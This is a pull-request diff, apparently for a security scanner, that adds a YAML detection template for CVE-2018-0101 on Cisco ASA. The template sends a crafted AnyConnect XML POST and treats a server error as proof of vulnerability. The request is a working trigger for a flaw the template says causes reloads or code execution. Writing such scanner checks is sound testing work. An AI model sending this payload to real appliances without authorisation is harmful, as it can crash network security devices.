Merge pull request #1058 from dwisiswant0/add/cves/2018/CVE-2018-0101

Add CVE-2018-0101
2021-04-01 14:02:28 +05:30 · 2021-04-01 14:02:28 +05:30 · 8d022bcbf7
parent 16c4b0e352 06827e41c9
commit 8d022bcbf7
2 changed files with 54 additions and 1 deletions
--- a/cves/2018/CVE-2018-0101.yaml
+++ b/cves/2018/CVE-2018-0101.yaml
@ -0,0 +1,52 @@
+id: CVE-2018-0101
+
+info:
+  name: Cisco ASA Denial-of-Service # Leads to RCE
+  author: dwisiswant0
+  severity: critical
+  reference: https://www.exploit-db.com/exploits/43986
+  description: |
+    A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
+    remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
+    the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
+  tags: cve,cve2018,cisco,dos,rce
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+        X-Aggregate-Auth: 1
+        X-Transcend-Version: 1
+        Accept-Encoding: identity
+        X-AnyConnect-Platform: linux-64
+        X-Support-HTTP-Auth: false
+        X-Pad: 0000000000000000000000000000000000000000
+
+        <?xml version="1.0" encoding="UTF-8"?>
+        <config-auth client="a" type="a" aggregate-auth-version="a">
+            <host-scan-reply>A</host-scan-reply>
+        </config-auth>
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
+
+      - type: dsl
+        dsl:
+          - "status_code_2 == 500"
+          - "status_code_2 == 501"
+          - "status_code_2 == 502"
+          - "status_code_2 == 503"
+          - "status_code_2 == 504"
+        condition: or
--- a/workflows/cisco-asa-workflow.yaml
+++ b/workflows/cisco-asa-workflow.yaml
@ -16,4 +16,5 @@ workflows:
    subtemplates:
      - template: cves/2020/CVE-2020-3187.yaml
      - template: cves/2020/CVE-2020-3452.yaml
-      - template: cves/2018/CVE-2018-0296.yaml
+      - template: cves/2018/CVE-2018-0296.yaml
+      - template: cves/2018/CVE-2018-0101.yaml